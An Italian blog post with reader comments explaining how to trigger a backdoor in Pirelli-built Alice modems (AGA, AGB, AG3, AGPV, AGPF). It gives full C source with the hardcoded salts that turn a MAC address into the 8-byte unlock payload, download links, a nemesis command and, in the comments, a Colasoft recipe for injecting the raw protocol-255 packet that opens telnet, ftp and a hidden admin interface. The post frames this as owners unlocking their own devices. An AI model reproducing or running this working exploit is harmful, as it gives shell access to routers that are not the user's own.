Sbloccare i modem Alice senza cacciaviti, seriali o ponticelli

Questo articolo è dedicato allo sblocco dei modelli AGA/AGB/AG2P-AG3/AGPV-AGPF dei modem Alice mediante backdoor.

se volete essere seguiti passo per passo o volete la soluzione pronta contattatemi via mail (la trovate nella Home) e cercherò di aiutarvi.

Io e drPepperOne abbiamo scoperto una backdoor nei modem Alice a base Broadcom che permette in un solo colpo da LAN di abilitare telnet, ftp, tftp e modalità web estesa. Ciò che molti non sanno è che nei modem c’è un vero e proprio Sistema Operativo e che telnet implementa in questi casi una vera e propria shell remota da cui controllare l’intero sistema. Inoltre le interfacce web estese (credo tutte) presentano una pagina per cambiare firmware senza troppe difficoltà

Per abilitare la backdoor è sufficiente inviare un pacchetto IP opportunamente formattato al modem su cui c’è un socket raw in ascolto.


Tale pacchetto deve avere le seguenti caratteristiche:
  • protocollo IP
  • Protocol Number 255
  • lunghezza 28 byte (8 byte di payload)
  • il payload è costituito dai primi 8 byte dell’md5 con salt del mac del device br0


in questi modelli di modem br0 ha lo stesso mac di eth0 ed è quindi facile da reperire. Esso si potrebbe anche ottenere dai mac di eth1 e wl0 che sono più o meno consecutivi a seconda dei modelli dei modem. Su AGA per esempio mac(eth1)=mac(eth0)+1 e mac(wl0)=mac(eth0)+4.


L’algoritmo di creazione del payload è il seguente:


Così com’è il programma prevede che venga passato come parametro un file di 6 byte contenente il mac di br0.Il file compilato su WinXP lo travate al seguente link:

saxdax & drPepperOne

/* Alice Backdoor Pwd creator by saxdax */
/* this code generates an 8 byte hash to use as the paylod of the ip packet */
/* the mac must be in an hex file and has to be passed as argument to the program */

#include
#include
#include
#include “md5.h”

/*
* RFC 1321 compliant MD5 implementation
*
* Copyright (C) 2001-2003 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/

#define GET_UINT32(n,b,i) \
{ \
(n) = ( (uint32) (b)[(i) ] ) \
| ( (uint32) (b)[(i) + 1] << 8 ) \
| ( (uint32) (b)[(i) + 2] << 16 ) \
| ( (uint32) (b)[(i) + 3] << 24 ); \
}

#define PUT_UINT32(n,b,i) \
{ \
(b)[(i) ] = (uint8) ( (n) ); \
(b)[(i) + 1] = (uint8) ( (n) >> 8 ); \
(b)[(i) + 2] = (uint8) ( (n) >> 16 ); \
(b)[(i) + 3] = (uint8) ( (n) >> 24 ); \
}

void md5_starts( md5_context *ctx )
{
ctx->total[0] = 0;
ctx->total[1] = 0;

ctx->state[0] = 0×67452301;
ctx->state[1] = 0xEFCDAB89;
ctx->state[2] = 0×98BADCFE;
ctx->state[3] = 0×10325476;
}

void md5_process( md5_context *ctx, uint8 data[64] )
{
uint32 X[16], A, B, C, D;

GET_UINT32( X[0], data, 0 );
GET_UINT32( X[1], data, 4 );
GET_UINT32( X[2], data, 8 );
GET_UINT32( X[3], data, 12 );
GET_UINT32( X[4], data, 16 );
GET_UINT32( X[5], data, 20 );
GET_UINT32( X[6], data, 24 );
GET_UINT32( X[7], data, 28 );
GET_UINT32( X[8], data, 32 );
GET_UINT32( X[9], data, 36 );
GET_UINT32( X[10], data, 40 );
GET_UINT32( X[11], data, 44 );
GET_UINT32( X[12], data, 48 );
GET_UINT32( X[13], data, 52 );
GET_UINT32( X[14], data, 56 );
GET_UINT32( X[15], data, 60 );

#define S(x,n) ((x << n) | ((x & 0xFFFFFFFF) >> (32 – n)))

#define P(a,b,c,d,k,s,t) \
{ \
a += F(b,c,d) + X[k] + t; a = S(a,s) + b; \
}

A = ctx->state[0];
B = ctx->state[1];
C = ctx->state[2];
D = ctx->state[3];

#define F(x,y,z) (z ^ (x & (y ^ z)))

P( A, B, C, D, 0, 7, 0xD76AA478 );
P( D, A, B, C, 1, 12, 0xE8C7B756 );
P( C, D, A, B, 2, 17, 0×242070DB );
P( B, C, D, A, 3, 22, 0xC1BDCEEE );
P( A, B, C, D, 4, 7, 0xF57C0FAF );
P( D, A, B, C, 5, 12, 0×4787C62A );
P( C, D, A, B, 6, 17, 0xA8304613 );
P( B, C, D, A, 7, 22, 0xFD469501 );
P( A, B, C, D, 8, 7, 0×698098D8 );
P( D, A, B, C, 9, 12, 0×8B44F7AF );
P( C, D, A, B, 10, 17, 0xFFFF5BB1 );
P( B, C, D, A, 11, 22, 0×895CD7BE );
P( A, B, C, D, 12, 7, 0×6B901122 );
P( D, A, B, C, 13, 12, 0xFD987193 );
P( C, D, A, B, 14, 17, 0xA679438E );
P( B, C, D, A, 15, 22, 0×49B40821 );

#undef F

#define F(x,y,z) (y ^ (z & (x ^ y)))

P( A, B, C, D, 1, 5, 0xF61E2562 );
P( D, A, B, C, 6, 9, 0xC040B340 );
P( C, D, A, B, 11, 14, 0×265E5A51 );
P( B, C, D, A, 0, 20, 0xE9B6C7AA );
P( A, B, C, D, 5, 5, 0xD62F105D );
P( D, A, B, C, 10, 9, 0×02441453 );
P( C, D, A, B, 15, 14, 0xD8A1E681 );
P( B, C, D, A, 4, 20, 0xE7D3FBC8 );
P( A, B, C, D, 9, 5, 0×21E1CDE6 );
P( D, A, B, C, 14, 9, 0xC33707D6 );
P( C, D, A, B, 3, 14, 0xF4D50D87 );
P( B, C, D, A, 8, 20, 0×455A14ED );
P( A, B, C, D, 13, 5, 0xA9E3E905 );
P( D, A, B, C, 2, 9, 0xFCEFA3F8 );
P( C, D, A, B, 7, 14, 0×676F02D9 );
P( B, C, D, A, 12, 20, 0×8D2A4C8A );

#undef F

#define F(x,y,z) (x ^ y ^ z)

P( A, B, C, D, 5, 4, 0xFFFA3942 );
P( D, A, B, C, 8, 11, 0×8771F681 );
P( C, D, A, B, 11, 16, 0×6D9D6122 );
P( B, C, D, A, 14, 23, 0xFDE5380C );
P( A, B, C, D, 1, 4, 0xA4BEEA44 );
P( D, A, B, C, 4, 11, 0×4BDECFA9 );
P( C, D, A, B, 7, 16, 0xF6BB4B60 );
P( B, C, D, A, 10, 23, 0xBEBFBC70 );
P( A, B, C, D, 13, 4, 0×289B7EC6 );
P( D, A, B, C, 0, 11, 0xEAA127FA );
P( C, D, A, B, 3, 16, 0xD4EF3085 );
P( B, C, D, A, 6, 23, 0×04881D05 );
P( A, B, C, D, 9, 4, 0xD9D4D039 );
P( D, A, B, C, 12, 11, 0xE6DB99E5 );
P( C, D, A, B, 15, 16, 0×1FA27CF8 );
P( B, C, D, A, 2, 23, 0xC4AC5665 );

#undef F

#define F(x,y,z) (y ^ (x | ~z))

P( A, B, C, D, 0, 6, 0xF4292244 );
P( D, A, B, C, 7, 10, 0×432AFF97 );
P( C, D, A, B, 14, 15, 0xAB9423A7 );
P( B, C, D, A, 5, 21, 0xFC93A039 );
P( A, B, C, D, 12, 6, 0×655B59C3 );
P( D, A, B, C, 3, 10, 0×8F0CCC92 );
P( C, D, A, B, 10, 15, 0xFFEFF47D );
P( B, C, D, A, 1, 21, 0×85845DD1 );
P( A, B, C, D, 8, 6, 0×6FA87E4F );
P( D, A, B, C, 15, 10, 0xFE2CE6E0 );
P( C, D, A, B, 6, 15, 0xA3014314 );
P( B, C, D, A, 13, 21, 0×4E0811A1 );
P( A, B, C, D, 4, 6, 0xF7537E82 );
P( D, A, B, C, 11, 10, 0xBD3AF235 );
P( C, D, A, B, 2, 15, 0×2AD7D2BB );
P( B, C, D, A, 9, 21, 0xEB86D391 );

#undef F

ctx->state[0] += A;
ctx->state[1] += B;
ctx->state[2] += C;
ctx->state[3] += D;
}

void md5_update( md5_context *ctx, uint8 *input, uint32 length )
{
uint32 left, fill;

if( ! length ) return;

left = ctx->total[0] & 0×3F;
fill = 64 – left;

ctx->total[0] += length;
ctx->total[0] &= 0xFFFFFFFF;

if( ctx->total[0] < length )
ctx->total[1]++;

if( left && length >= fill )
{
memcpy( (void *) (ctx->buffer + left),
(void *) input, fill );
md5_process( ctx, ctx->buffer );
length -= fill;
input += fill;
left = 0;
}

while( length >= 64 )
{
md5_process( ctx, input );
length -= 64;
input += 64;
}

if( length )
{
memcpy( (void *) (ctx->buffer + left),
(void *) input, length );
}
}

static uint8 md5_padding[64] =
{
0×80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

void md5_finish( md5_context *ctx, uint8 digest[16] )
{
uint32 last, padn;
uint32 high, low;
uint8 msglen[8];

high = ( ctx->total[0] >> 29 )
| ( ctx->total[1] << 3 );
low = ( ctx->total[0] << 3 );

PUT_UINT32( low, msglen, 0 );
PUT_UINT32( high, msglen, 4 );

//for(int i=0;i<8;i++) printf(”length %d\n”,msglen[i]);

last = ctx->total[0] & 0×3F;
padn = ( last < 56 ) ? ( 56 – last ) : ( 120 – last );

md5_update( ctx, md5_padding, padn );
md5_update( ctx, msglen, 8 );

PUT_UINT32( ctx->state[0], digest, 0 );
PUT_UINT32( ctx->state[1], digest, 4 );
PUT_UINT32( ctx->state[2], digest, 8 );
PUT_UINT32( ctx->state[3], digest, 12 );
}

//#ifdef TEST

/*
* those are the standard RFC 1321 test vectors
*/

static char *msg[] =
{
“”,
“a”,
“abc”,
“message digest”,
“abcdefghijklmnopqrstuvwxyz”,
“ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789″,
“12345678901234567890123456789012345678901234567890123456789012″ \
“345678901234567890″
};

static char *val[] =
{
“d41d8cd98f00b204e9800998ecf8427e”,
“0cc175b9c0f1b6a831c399e269772661″,
“900150983cd24fb0d6963f7d28e17f72″,
“f96b697d7cb7938d525a2f31aaf161d0″,
“c3fcd3d76192e4007dfb496cca67e13b”,
“d174ab98d277d9f5a5611c2c9f419d9f”,
“57edf4a22be3c955ac49da2e2107b67a”
};

//Salt per AGA/AGB/AG3(Vela)
static char saltOrig[] =
{0×04, 0×07, 0×67, 0×10, 0×02, 0×81, 0xFA, 0×66, 0×11, 0×41, 0×68, 0×11, 0×17, 0×01, 0×05, 0×22, 0×71, 0×04, 0×10, 0×33};
//Salt per AGPV/AGPF
//static char saltOrig[] =
//{0×43, 0×22, 0×11, 0×11, 0×22, 0×81, 0xFA, 0×65, 0×11, 0×41, 0×54, 0×11, 0×17, 0×12, 0×15, 0×22, 0×72, 0×03, 0×10, 0×66};

int main( int argc, char *argv[] )
{
FILE *f;
int i, j;
char output[33];
md5_context ctx;
unsigned char buf[1000];
unsigned char md5sum[16];
unsigned char salt[20];

printf( “****************************\n”);
printf( “Alice BackDoor hash creator \n”);
printf( “by saxdax and drPepperOne \n”);
printf( “****************************\n\n”);

if( argc < 2 )
{
printf( “\n Usage: %s pathfileMAC\n\n”, argv[0] );
return 0;
}

if( ! ( f = fopen( argv[1], “rb” ) ) )
{
perror( “fopen” );
return( 1 );
}

md5_starts( &ctx );

while( ( i = fread( buf, 1, sizeof( buf ), f ) ) > 0 )
{
md5_update( &ctx, buf, i );
}

memcpy(salt, saltOrig, 20);

md5_update( &ctx, salt, 20 );

md5_finish( &ctx, md5sum );

printf(”Payload is: “);
for( j = 0; j < 8; j++ )
{
printf( “%02x”, md5sum[j] );
}

return( 0 );
}

 

AGA/AGB/AG3 http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html
AGPV/AGPF http://rapidshare.com/files/156053651/md5_AGPV_AGPF.exe.html

Tali programmi sono validi fino alle seguenti versioni di firmware:

AG2P: 3.1.0
AG3: 3.2.4
AGA: 3.2.4
AGB: 3.2.4
AGPF: AGPF_4.3.4.0001 (e la 4.4.0)
AGPV: 4.3.1

Il programma deve essere lanciato da linea di comando e restituisce a video gli 8 byte del payload.

A questo punto potete utilizzare qualsiasi strumento di injection preferiate.

Io ho utilizzato Colasoft Packet Builder, generatore visuale con GUI su Windows.

Allego il template di un pacchetto già pronto in cui cambiare solo IP del modem e del pc, mac del modem e del pc e payload (nalla parte in basso a sinistra esadecimale di colasoft PB):

http://www.megaupload.com/?d=8OH6NFX1

posizione payload

posizione payload

drPepperOne ha utilizzato Nemesis da linea di comando, disponibile per Linux e Windows.

Una volta creato un file di 8 byte con un editor esadecimale, con nome per es. hash.hex, la sintassi da usare con Nemesys è:

Code: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex

Se il pacchetto è corretto il router risponderà con un pacchetto ICMP con codici 3 e 2 (protocol unreachable).

A questo punto potete collegarvi a telnet, ftp e tftp ed utilizzare l’interfaccia web estesa senza aver aperto il modem!

Buon divertimento.

356 Responses to “Sbloccare i modem Alice senza cacciaviti, seriali o ponticelli”

  1. Ciao ho seguito al passo la tua guida..mi dice IP Packet Injected ma se eseguo telnet 192.168.1.1 mi dice:
    Trying 192.168.1.1…
    telnet: Unable to connect to remote host: Connection refused

    Cosa ho sbagliato???inoltre non riesco a capire come farei ad avere un payload di 8 byte…ho guardato sulle propriet’ del file e segna 16B…
    Aspetto un vostro aiuto…!
    Grazie mille!!!

  2. evidentemente hai usato un editor di testo anzichè un editor esadecimale.
    il file con il mac dev’essere di 6 byte e il file con il payload di 8 byte.

  3. Ciao e un ringraziamento anticipato per il tuo ottimo lavoro.

    Ti allego il testo di un mio messaggio immesso nel Forum de ilpuntotecnicoeadsl.com al quale purtroppo non è seguita una risposta.
    Spero tu possa aiutarmi.

    Ho un AGA al quale ho sostituito il firmware originale con quello chiamato AGW2-PLUS_flash_image_8MB.w (Pirelli)
    La procedura non ha avuto particolari problemi.
    Una volta messe in corto le due famose piazzole segnate in rosso, ho riacceso il router, il led del Power s’è acceso in rosso ecc. ecc.

    Dopo qualche giorno di prove, mi sono deciso a sostiture il firmware con quello chiamato USRAGW2-PLUS_fs_kernel_3.04L.01.-090315_1900, penso più adatto alle mie esigenze (non ho Alice Flat) cercando di passare prima da AGW2-PLUS_psi_clear.

    Ma qui mi sono bloccato.

    Ho provato e riprovato non meno di 100 volte a ripetere la procedura del ponticello sulle due famose piazzole ma…

    Niente da fare!
    Ho provato anche a saldarci due fili in rame per essere sicuro di aver fatto il corto…

    Il led power si accende sempre regolarmente in verde e il router si avvia normalmente e me lo ritrovo come sempre all’indirizzo 192.168.1.1 (o 192.168.1.1/main.html se voglio andare nel menu Pirelli).

    Alla fine non sapendo cosa fare, e non trovando altra via, sono andato nella pagina di aggiornamento del firmware Pirelli per fare l’upload di AGW2-PLUS_psi_clear.

    Appena terminato l’upload il router s’è riavviato come previsto ma adesso è irraggiungibile dal consueto indirizzo e come sempre non riesco a riavviarlo con la procedura del ponticello.

    Ho successivamente provato questa tua procedura ma non succede niente e il router resta irraggiungibile sia in Telnet che in http.
    Penso che tutto dipenda dal psi_clear che ha piallato tutto nella flash…

    Che faccio adesso?

    Devo ricorrere alla JTAG?
    Semmai quale tipo?
    Quella semplice che ha le sole resistenze è sufficiente?
    Eventualmente lo schema di connessione verso l’interfaccia a 14 pin nella piastra dell’AGA?
    Ti descrivo il tipo del mio Alice Gate voip 2 Plus Wi-Fi:
    la flash montata è la MX29LV640DTTC-90G
    L’etichetta hardware dice: IO1L011 REV. 3 GP

    Grazie infinite per l’aiuto.

  4. Ciao Pertecara,

    il mio metodo si applica solo ai firmware Pirelli. Non funziona se intanto lo hai sovrascritto con uno USRobotics.
    Nel tuo caso credo proprio che l’unico metodo per sperare di recuperare il modem sia tramite JTAG.
    Non sono ancora esperto di JTAG e seriali (motivo per cui cerco tutti i modi possibili di sbloccare i modem via software) e quindi ti rimando agli esperti sul forum da te indicato.

    Buona fortuna

  5. Grandissimo tutorial
    Non ho ancora provato la procedura perchè ho una domanda.
    E’ possibile tornare indietro e riportare lo stato come da mamma Telecom dato che mi hanno detto che se per caso lo devo sostituire se è manomesso me lo fanno ripagare?
    Grazie.

  6. Scusa. Sempre io.
    Ma con i firmware attuali funziona ancora?
    Io ho l’AGPF_4.3.5 e facendo la procedura non succede assolutamente nulla.
    I file sono creati alla perfezione, il comando nemesis mi da la conferma, ma nulla cambia.
    Ciao e grazie anticipatamente.

  7. @Tuttokekko

    lo sblocco con questo metodo permette di ottenere l’accesso ad una sezione nascosta già presente nel firmware originale. Equivale a modificare solo due righe del file di configurazione.

    Si può tornare indietro in due modi.
    1) Reimpostando opportunamente il file di configurazione.
    2) resettando via hardware il modem (per l’agpf basta tenere premuto 20 secondi durante l’accensione il tasto di reset)

    Per quanto riguarda la seconda domanda, il codice pubblicato per AGPF funziona finon alla versione 4.3.3 (e anche per 4.4.0). Per le 4.3.4 e 4.3.5 cambia il payload. NOn ho pubblicato il codice per questi ultimi anche se esiste.

    Ciao

  8. Complimenti per la guida, ma nel mio caso non pare funzionare. Sicuramente sbaglio qualcosa, dal momento che non sono espertissimo.
    Il mio è un Alice Gate 2 Plus (non wifi), l’etichetta sotto dice Alice Business Gate 2 Plus, e dalla pagina principale del router leggo che ha software AGB_3.2.4.
    Seguita la procedura, creato il file del MAC address con un editor hex (6 byte), copiato il risultato del software del primo link in un nuovo file hex da 8 byte. Inviato il pacchetto con nemesis, ottengo “IP packet injected”, e pare non essere cambiato nulla.
    Premetto che subito dopo ho provato ad entrare in ftp semplicemente digitando in IE8 (ma anche Chrome) ftp://192.168.1.1. Scusate l’ignoranza, non so se questo è sufficiente.

    Idee? Consigli? Insulti?

  9. Una precisazione: il MAC address che ho inserito nel file hex di 6 byte è quello che trovo sull’etichetta posta sotto il router. Se non ho capito male è quello da inserire… o no?

  10. Ciao Francesco,

    il mac è quello stampato sotto il modem.
    La procedura sembra corretta.
    E’ importantissimo killare momentaneamente qualsiasi firewall o antivirus installati sul pc.
    E’ importante eseguire la procedura via cavo; l’invio di pacchetti (injection) in wifi è un po’ più delicato.
    Per conferma sulla correttezza del payload mandami il mac per email.
    In alternativa prova con Colasoft Packet Builder.

    Ciao

  11. Giusto per rispondere, Franceso ha risolto usando Colasoft Packet Builder.

    Ciao

  12. Poichè nemesis non funziona a causa di problemi con la packet.dll potresti spiegarmi come utilizzare il payload con Colasoft Packet Builder? Grazie!

  13. il payload di 8 byte va scritto nella parte sinistra in basso di colasoft Packet Builder. Per intenderci la parte esadecimale e non testuale.
    Per verificare la correttezza dell’operazione alla fine dovresti trovarti una dimensione di 28 byte.

  14. Scusa se ti riscrivo… potresti mandarmi un esempio, anche per posta, di come creare il pacchetto ip da inviare? Purtroppo qualunque tipo di pacchetto io crea e per come lo modifico non riesco ad ottenere i 28byte.
    Oltretutto anche risolvendo i problemi di dll con nemesis ottengo il seguente messaggio di errore: “Unable to retrieve the list of the adapters!
    failed to select device
    ERROR: Unable to open raw socket for packet injection: .
    You may need Administrator privileges to use nemesis.

    IP Injection Failure”

    Grazie.

  15. ti ho mandato un template del pacchetto da inviare con colasoft PB in cui cambiare solo i dati necessari: IP tuo e del modem, mac tuo e del modem, payload.

    Ciao

  16. Sei un grande!!! Grazie infinite!!!

  17. printf( “****************************\n”);
    printf( “Alice BackDoor hash creator \n”);
    printf( “by saxdax and drPepperOne \n”);
    printf( “****************************\n\n”);

    if( argc < 2 )
    {
    printf( “\n Usage: %s pathfileMAC\n\n”, argv[0] );
    return 0;
    }

    A ME CAPITA QUESTO, CIOè RICHEDE IL PATHFILEMAC MA NN SO COSA SIA, PENSAVO FOSSE L’INDIRIZZO MAC, MA MI DA ERRORE…

  18. @fabio

    quello che viene richiesto è il percorso completo di nome (path appunto) in cui si trova il file di 6 byte contenente il mac (creato con editor esadecimale).

  19. sn in windows, collego il router (firmware 4.3.2) a power, lan e adsl, accendo il router, scrivo il file esadecimale del mac address e creo il payload con la backdoor scaricata; poi prendo il payload e lo riscrivo sottoforma esadecimale, il risultato lo copio nella parte in basso a sinistra del programma colasoft;(per poter sciverlo in basso a sinistra, premo in colasoft ADD- IP PACKET, cancello quello che c’era scritto e metto il mio payload); ovviamente sorgente e destinatario non sono ne il mio pc ne il router, credo sia normale, comunque ovviamente premo SENT e quando invio non succede proprio nulla, neanke un messaggio, niente di niente….ho sbagliato qualksa vero?

  20. il metodo della “wiki” non ha dato i frutti sperati, adesso riprovo il tuo (PERO’ SE QUALKUNO HA GIA RICEVUTO DA SAXDAX UN TEMPLATE DEL PACCHETTO DA INVIARE CON COLASOFT ME LO INVII [TIPO FABRY...] ). se non iresco a sbloccarlo ancora, allora proverò a ponticellare §_§

    Fatemi sapere e vi farò sapere ^_^

  21. nell’articolo ho aggiunto il template di un pacchetto già pronto per Colasoft Packet Builder.

    Ora non potete più sbagliare :)

  22. niente…devo provare per forza a ponticellare.
    Il template era giusto e l’ho mandato piu e piu volte (ho killato sia avast ke firewall di windows). Ho provato ad entrare in telnet ma niente.
    A e devo anche dire che il metodo della wiki nn ha dato i suoi frutti

    Secondo me è il mio tipo di modem ke nn va bene perchè è il tipo business oppure perchè ho l’agpf 4.3.2
    a ma mika dovevo installare il cd di alice prima….=)….sn proprio disperato

  23. Ciao! Ma questa guida serve principalmente ad avere accesso telnet? L’interfaccia web estesa dopo la procedura in che pagina si troverà? L’accesso telnet serve principalmente per modificare i valori snr? Se si utilizza questa procedura bisogna disattivare la Telegestione? come?

    Grazie in anticipo :)

  24. ciao saxdax,
    ho trovato in un sito un eseguibile ch sembri automatizzare tutte le tue procedure.io non l’ho provato per precauzione, ma a te risulta che funzioni?
    http://www.evilsocket.net/sources/alicefuck.sh.txt

    grazie

  25. @ioenopio

    quella è la traduzione in script bash del mio algoritmo. Funziona su linux a patto di avere installato nemesis e qualcos’altro.

    Ci sono tuttavia anche degli eseguibili per linux ancora più compatti sul thread dedicato alla mia procedura di sblocco su http://www.ilpuntotecnicoeadsl.com.

    Ciao

  26. Ciao a tutti, avendo un router alice gate 2 plus wifi con software AGIA_1.2.0, la procedura descritta funziona? o il payload che viene generato non vale per questo firmware? Ho provato in tutti i modi la procedura (sia linx che windows) ma senza alcun risultato…..

  27. @c4nc

    no. la procedura funziona solo sui modem Pirelli Alice elencati nell’articolo.
    L’AGIA è delle Industrie Dialface.

    Ci sono altri metodi di sblocco per questo.

    Vedi su http://www.ilpuntotecnicoeadsl.com/forum per maggiori info

    Ciao

  28. Ho testato su un vecchio modem alice gate 2 wifi plus del 2005 e funziona alla perfezione (sotto linux ho usato come editor esadecimale Ghex2 e nemesis per fare l’injection del pacchetto IP). Oltre all’accesso via web alle funzionalità estese (http://192.168.1.1/main.html) e tramite telnet mi piacerebbe far funzionare l’ssh ma anche se risulta abilitato non funziona. Anche il forward delle richieste dns non va. Il firmware esistente non mi pare un granché. A questo punto ha senso caricarci tramite la funzionalità di upload da interfaccia gui un firmware più recente di quelli supportati da questa procedura e se si, dove potrei reperirlo? Grazie intanto per lo splendido lavoro che mi ha consentito di risparmiare i soldi di un nuovo modem essendo passato a infostrada dopo l’iniziativa truffa di telecom (http://notinmylivingroom.blogspot.com)
    ciao!

  29. Ciao, ho letto il tuo topic e mi sono incuriosito. PRima di tutto voglio farvi i complimenti.

    Volevo sapere se il metodo elencato può funzionare con AGPF_4.3.5a ? Preservo le funzioni dell’Alice TV (digitale terreste e televisione via cavo) ? Rimangono le funzioni del VOIP ?

    Ogni qual volta che la telecom fa un aggiornamento del firmware devo rifare tutta la procedura?

    Sono intresssato solo perchè voglio configurare il gateway del router. Grazie mille aspetto una risposta ^^

  30. @alex77

    sono contento di esserti stato utile. Per le opzioni possibili su questi modem ti rimando al forum http://www.ilpuntotecnicoeadsl.com/forum.
    Troverai tanti spunti interessanti.

    @Rytx
    Per quanto riguarda l’AGPF 4.3.5a non ho ancora avuto modo di testare. Comunque già per il 4.3.5 il tool di creazione del payload non è pubblicato (anche se esiste).
    Ti farò sapere.
    Per quanto riguarda le funzionalità telecom, il metodo in questione non è per niente invasivo e mantiene tutte le funzionalità del gestore.

    A presto

  31. Ciao grazie della risposta celere, sai per caso se esiste un modo per tornare al firmware precedente per poter applicare lo “sblocco” ?

    grazie

  32. se per “tornare al firmware precedente” intendi disattivare gli effetti dello sblocco, allora devi selezionare il “restore default settings” da interfaccia avanzata o da telnet.

    Ciao

  33. ciao, complimenti per l’ottima guida!!
    Potresti, quando avrai tempo, pubblicare le specifiche per il firmware del pirelli wi-fi AGPF_4.3.5a?
    Con la versione AGPF_4.3.5 era possibile entrare nel SO del router, adesso non c’è versi.
    Te ne sarei (saremo, visto che il firmware si aggiorna automaticamente e molti sono nella mia condizione) grato.

    Ultima domanda: siccome il pirelli aggiorna il firmware in automatico, c’è modo di bloccare questo processo?

    Grazie ancora

    Spino

  34. Salve, avrei bisogno del template per il pacchetto per Colasoft Packet Builder, ma il link non va perché il sito dice che è stato raggiunto il limite dei download per quel file.

    Qualcuno potrebbe gentilmente creare un link per megaupload o inviarmi quel template per favore?

    Grazie e arrivederci!

  35. Ciao,
    mi potresti chiarire “Per quanto riguarda l’AGPF 4.3.5a non ho ancora avuto modo di testare. Comunque già per il 4.3.5 il tool di creazione del payload non è pubblicato (anche se esiste).”

    In che senso non è pubblicato…da chi ??
    Cerchiamo di darci una mano per “procurarcelo” !
    Ciao,
    Marco

  36. Ciao mavelot,

    ovviamente IO non ho pubblicato per motivi già esposti. Ci sarebbe una corsa continua tra me e gli sviluppatori telecom/pirelli che non mi va di cominciare.

    Ciao

  37. Ciao,
    ti ringrazio per la sollecita risposta.

    Peccato che non ho le necessarie conoscenze per fare il reverse engeenering che hai fatto tu….
    Spero solo che quando proverò i firmware successivi, si riesca almeno ad abilitare il tutto da console…anche se non è escluso che abbiano inibilto anche quella
    Ciao

  38. ciao, a me quando uso nemesis mi spunta come errore questa scritta “impossibile trovare il punto di ingresso PacketGetNetInfo della procedura nella libreria di collegamento dinamico packet.dll
    ti ringrazio anticipatamente fammi sapere ciao.

  39. Ciao a tutti, qualcuno che ha scaricato il template per Colasoft potrebbe x favore renderlo disponibile (il link su rapidshare da errore) e non sono certo di aver fatto tutto bene nella costruzione del pacchetto … infatti non funziona.
    Ho AGPF_4.5.0 e sto usando algoritmo di creazione payload che mi sembra generico (per tutti le versioni di firmware ??) infati genera payload diverso da quello linkato in discussione. Grazie ciao

  40. ciao, trascurate la richiesta precedente. Ho trovato il template in altro forum e ho capito che la causa del non funzionamento è la versione del fw grazie

  41. potresti dire su che forum o incollare un link al template per favore.. ? grazie

  42. il template si può trovare su forum legati allo sblocco delle del modem/router su http://www.ilpuntotecnicoeadsl.com.
    mini guida a Colasoft visto che ho fatto diverse prove:
    1) add packet
    2) scegliere tipo IP
    3) cambiare i valori:
    Destination address: MAC modem (separati da :)
    Source address: MAC scheda rete (separato da :)
    Total Lenght: impostare 28
    Protocol: 255
    Source IP: IP scheda rete
    Destination IP: IP modem
    Number of Bytes: selezionare la voce e nell’editor hex cancellare i vaolri e inseire gli 8byte del payload
    4) selezionare il pacchetto con click dx Send
    spero di esserti stato d’aiuto, ciao

  43. Ciao ragazzi ho appena seguito la procedura a puntino tentando di sbloccare ALICE GATE VoIP 2 Plus Wifi con firmare versione 4.3.5a.Faccio tutto con windows:Creo il file da 8Byte(contenente il payload) con un editor esadecimale.Poi da linux inietto il pacchetto nel router tramite nemesis.
    Alla fine della procedura mi dice “IP PACKET INJECTED”, quindi tutto sembra essere andato a buon fine,ma in realtà nel router non si è attivato il menu avanzato segreto…
    Avete qualche consiglio?
    Cosa ho sbagliato secondo voi?
    Qualcuno può aiutarmi?Grazie mille

  44. semplicemente non hai letto la parte in cui dico:

    “Tali programmi sono validi fino alle seguenti versioni di firmware:” etc etc.

    Non ho ancora trovato il tempo di lavorare sulla 4.3.5a (così come la 4.5.0). Se sei interessato e vuoi fare una donazione contattami per mail.

  45. Io ho un firmware 4.5.0 e vorrei fare una prova:
    qualcuno con un firmware sbloccato (tipo il 4.3.5) ed il telnet attivo, può esportare la configurazione dall’interfaccia telecom (non dal menu avanzato) e mandarmela a [email protected]?

    Se nel file di configurazione c’è anche il flag della porta telnet, magari caricandolo sul mio mi si attiva e riesco a riguadagnare l’accesso perso con un recente aggiornamento.

  46. Mmm… cercando, qualcuno ha scoperto un’altra soluzione:
    http://gagginaspinnata.altervista.org/blog/?p=41&cpage=1#comments
    Ma… si ottiene lo stesso risultato, cioè l’accesso alle impostazioni delle firmware originale del router?
    Adesso non ce l’ho con me e non posso provare

  47. no Mr Wolf,

    quello che tu indichi si riferisce ai Dialface, non hai Pirelli.
    E comunque tutte le scoperte su questi modem credo che abbiano una sola fonte: http://www.ilpuntotecnicoeadsl.com/forum (o wiki).

    Ciao

  48. Ho capito, non sapevo ci fosse un altro produttore
    La procedura che hai descritto funziona con Alice Gate 2 plus Wi-Fi AGA_3.2.6?
    Ché poi, non ho capito una cosa: al programmino di cui hai postato il link va passato il MAC del router?

  49. Ciao Mr Wolf,

    è tutto scritto sopra.
    Non funziona con AGA 3.2.6.
    Devi passare al programma un file esadecimale di 6 byte con dentro il mac.

  50. Ciao, e complimenti.
    Volevo solo sapere se eri al lavoro per quanto riguarda il firmware AGPF_4.5.0, che è per il momento inattaccabile.

  51. Ciao, volevo farti una domanda: per quanto riguarda il fw AGA_3.2.4 ho preso il mac address del router che però è composto da 6 serie da 2 caratteri per un totale di 12 caratteri hex. Nel file macTemplate.hex allegato insieme a MD5.EXE vedo con hexedit un totale di 14 caratteri? cosa devo fare?

  52. [email protected]: ti ho mandato un template del pacchetto da inviare con colasoft PB in cui cambiare solo i dati necessari: IP tuo e del modem, mac tuo e del modem, payload…

